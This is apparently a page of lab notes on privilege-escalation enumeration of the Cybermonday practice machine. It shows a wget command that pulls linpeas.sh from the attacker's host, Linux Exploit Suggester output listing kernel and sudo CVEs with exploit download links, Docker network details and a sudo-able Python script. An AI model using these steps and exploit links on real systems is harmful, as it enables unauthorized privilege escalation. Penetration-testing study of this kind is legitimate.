PEAS

john@cybermonday:/dev/shm$ wget -q http://10.10.14.12/linpeas.sh ; chmod 755 /dev/shm/linpeas.sh

Delivery complete

Executing PEAS

CVEs

╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2021-3490] eBPF ALU32 bounds tracking for bitwise ops
 
   Details: https://www.graplsecurity.com/post/kernel-pwning-with-ebpf-a-love-story
   Exposure: probable
   Tags: ubuntu=20.04{kernel:5.8.0-(25|26|27|28|29|30|31|32|33|34|35|36|37|38|39|40|41|42|43|44|45|46|47|48|49|50|51|52)-*},ubuntu=21.04{kernel:5.11.0-16-*}
   Download URL: https://codeload.github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490/zip/main
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
 
[+] [CVE-2022-0847] DirtyPipe
 
   Details: https://dirtypipe.cm4all.com/
   Exposure: probable
   Tags: ubuntu=(20.04|21.04),[ debian=11 ]
   Download URL: https://haxx.in/files/dirtypipez.c
 
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
 
   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: less probable
   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
 
[+] [CVE-2022-2586] nft_object UAF
 
   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: less probable
   Tags: ubuntu=(20.04){kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
 
[+] [CVE-2021-3156] sudo Baron Samedit
 
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: mint=19,ubuntu=18|20, debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
 
[+] [CVE-2021-3156] sudo Baron Samedit 2
 
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
 
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
 
   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

Networks

br-ccc51e38e8e5: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.18.0.1  netmask 255.255.0.0  broadcast 172.18.255.255
        inet6 fe80::42:4ff:fe8f:b77d  prefixlen 64  scopeid 0x20<link>
        ether 02:42:04:8f:b7:7d  txqueuelen 0  (Ethernet)
        RX packets 67966  bytes 205003264 (195.5 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 69764  bytes 18942194 (18.0 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
docker0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:3d:79:dd:12  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.228  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 fe80::250:56ff:feb9:3075  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:3075  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:30:75  txqueuelen 1000  (Ethernet)
        RX packets 84074  bytes 27010607 (25.7 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 79299  bytes 207663138 (198.0 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
veth7852bd0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::3c76:7cff:fefb:a7c6  prefixlen 64  scopeid 0x20<link>
        ether 3e:76:7c:fb:a7:c6  txqueuelen 0  (Ethernet)
        RX packets 246  bytes 35775 (34.9 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 309  bytes 28781 (28.1 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
veth8ad9cb1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::10ae:a3ff:fe49:e227  prefixlen 64  scopeid 0x20<link>
        ether 12:ae:a3:49:e2:27  txqueuelen 0  (Ethernet)
        RX packets 68434  bytes 205921257 (196.3 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 79778  bytes 218414126 (208.2 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
veth93cc5cb: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::c429:2cff:fe0e:a1ca  prefixlen 64  scopeid 0x20<link>
        ether c6:29:2c:0e:a1:ca  txqueuelen 0  (Ethernet)
        RX packets 12532  bytes 199615883 (190.3 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2565  bytes 176788 (172.6 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
vetha272285: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::745f:42ff:fe01:1902  prefixlen 64  scopeid 0x20<link>
        ether 76:5f:42:01:19:02  txqueuelen 0  (Ethernet)
        RX packets 2290  bytes 224446 (219.1 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2377  bytes 168859 (164.9 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
vethc28fe1a: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::18bd:17ff:feab:17a4  prefixlen 64  scopeid 0x20<link>
        ether 1a:bd:17:ab:17:a4  txqueuelen 0  (Ethernet)
        RX packets 698  bytes 1190135 (1.1 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1124  bytes 1195217 (1.1 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
vethc5b3571: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::e8e4:89ff:fe2f:a82  prefixlen 64  scopeid 0x20<link>
        ether ea:e4:89:2f:0a:82  txqueuelen 0  (Ethernet)
        RX packets 143  bytes 15751 (15.3 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 157  bytes 18132 (17.7 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Additional Network information, some of which are relevant to the Docker containers

sudo privileges

PEAS also picked up the sudo privileges of the john user

/opt

This must be the Python script for the sudo privileges;/opt/secure_compose.py

InfoSec LAB

Explorer

Cybermonday_Automated

PEAS

CVEs

Networks

sudo privileges

/opt

Interactive Graph View

Table of Contents

Backlinks